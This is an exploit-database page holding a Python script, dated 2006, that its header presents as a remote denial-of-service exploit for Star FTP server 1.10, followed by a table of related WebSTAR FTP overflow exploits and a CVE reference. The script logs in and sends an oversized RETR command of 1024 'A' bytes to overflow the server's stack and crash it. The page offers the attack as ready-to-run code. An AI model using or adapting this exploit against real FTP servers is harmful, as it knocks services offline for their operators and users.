# Star FTP server 1.10 # Bug type: stack overflow # Found by Necro <neco * ihack.pl> http://iHACK.pl from socket import * from sys import exit print '\n[*] Star FTP server 1.10 Remote 0day DoS Exploit' print '[*] Bug found by Necro <necro*ihack.pl> http://iHACK.pl' host = '127.0.0.1' port = 21 username = 'necro' password = 'dupa' evil = 'RETR' + '\x20' + '\x41' * 1024 + '\r\n' s = socket(AF_INET, SOCK_STREAM) try: s.connect((host, port)) except: print '\n[-] Connection Error' exit() s.recv(1024) s.send('USER' + '\x20' + username + '\r\n') s.recv(1024) s.send('PASS' + '\x20' + password + '\r\n') s.recv(1024) s.send('PORT 2000\r\n') s.recv(1024) s.send(evil) s.recv(1024) s.send(evil) s.close() print '[+] Done, shutdown.' # milw0rm.com [2006-12-17]
Related Exploits
Trying to match CVEs (1): CVE-2006-6643Trying to match OSVDBs (1): 32334
Trying to match setup file: 610955886bd3c7e4e2d25a51e2687258
Other Possible E-DB Search Terms: Star FTP Server 1.10, Star FTP Server
Date | D | V | Title | Author |
---|---|---|---|---|
2010-09-20 |
![]() |
WebSTAR FTP Server - USER Overflow (Metasploit) | Metasploit | |
2004-07-13 |
![]() |
WebSTAR FTP Server 5.3.2 (OSX) - USER Overflow (Metasploit) | ddz | |
2003-09-11 |
![]() |
4D WebSTAR FTP Server Suite - Remote Buffer Overflow | B-r00t |